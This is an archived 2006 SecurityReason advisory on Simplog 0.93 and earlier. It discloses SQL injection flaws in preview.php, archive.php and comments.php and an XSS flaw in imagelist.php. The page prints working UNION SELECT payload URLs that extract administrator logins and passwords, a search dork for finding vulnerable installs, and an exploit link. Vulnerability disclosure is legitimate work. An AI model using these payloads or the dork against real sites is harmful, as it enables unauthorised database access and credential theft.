|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  SecurityAlert Database |
||||
SecurityAlert : 799 CVE : CVE-2006-2029 CVE : CVE-2006-2028 SecurityRisk : Medium  (About) Remote Exploit : Yes Local Exploit : No Exploit Given : Yes Credit : Mustafa Can Bjorn IPEKCI (nukedx nukedx com) Published : 28.04.2006
Advisory Text : --Security Report-- Advisory: Simplog <= 0.93 Multiple Remote Vulnerabilities. --- Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI --- Date: 21/04/06 22:13 PM --- Contacts:{ ICQ: 10072 MSN/Email: nukedx (at) nukedx (dot) com [email concealed] Web: http://www.nukedx.com } --- Vendor: Simplog (http://www.simplog.org/) Version: 0.93 and prior versions must be affected. About: Via this methods remote attacker can inject arbitrary SQL queries to tid parameter in preview.php, cid,pid and eid in archive.php and pid in comments.php.As u know rgod was published advisory about version 0.92 but he did not notice this SQL injections. He found other SQL injections on archive.php but did not found these vulnerabilities. Also there is cross site scripting vulnerability in imagelist.php's imagedir parameter. Level: Critical --- How&Example: SQL Injection : Needs MySQL > 4.0 GET -> http://[victim]/[simplogdir]/preview.php?adm=tem&blogid=1&tid=[SQL] GET -> http://[victim]/[simplogdir]/archive.php?blogid=1&cid=[SQL] GET -> http://[victim]/[simplogdir]/archive.php?blogid=1&pid=[SQL] GET -> http://[victim]/[simplogdir]/archive.php?blogid=1&eid=[SQL] EXAMPLE -> http://[victim]/[simplogdir]/preview.php?adm=tem&blogid=1&tid=-1/**/UNIO N/**/SELECT/**/ concat(25552,login,25553,password,25554)/**/from/**/blog_users/**/where/ **/admin=1/* EXAMPLE -> http://[victim]/[simplogdir]/archive.php?blogid=1&cid=-1/**/UNION/**/SEL ECT/**/0,null,0,email,0,0,login, password,0,admin,0/**/from/**/blog_users/**/where/**/admin=1/* EXAMPLE -> http://[victim]/[simplogdir]/archive.php?blogid=1&pid=-1/**/UNION/**/SEL ECT/**/0,null,0,email,0,0,login, password,0,admin,0/**/from/**/blog_users/**/where/**/admin=1/* EXAMPLE -> http://[victim]/[simplogdir]/archive.php?blogid=1&eid=-1/**/UNION/**/SEL ECT/**/0,null,0,email,0,0,login, password,0,admin,0/**/from/**/blog_users/**/where/**/admin=1/* EXAMPLE -> http://[victim]/[simplogdir]/comments.php?blogid=1&pid=-1/**/UNION/**/SE LECT/**/0,null,0,email,0,0,login, password,0,admin,0/**/from/**/blog_users/**/where/**/admin=1/* with this examples remote attacker can leak speficied admins login information from database. XSS: GET -> http://[victim]/[simplogdir]/imagelist.php?blogid=1&act=add_entry&login= 1&imagedir=[XSS] --- Timeline: * 21/04/2006: Vulnerability found. * 21/04/2006: Contacted with vendor and waiting reply. --- Exploit: http://www.nukedx.com/?getxpl=25 --- Dorks: "powered by simplog" --- Original advisory can be found at: http://www.nukedx.com/?viewdoc=25  Feedback : If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com. |
||||
| Alert | ||
Multiple Vendors libc/gdtoa printf(3) Array Overrun
SecurityReason realised new advisory about vulnerabilities libc/gdtoa... |
||
| Apache |  |
|
» Apache Tomcat |
||
» Apache Tomcat User |
||
| PHP | |
|
» PHP |
||
- 2009-05-30| Copyright © SecurityReason.com. All Rights Reserved. |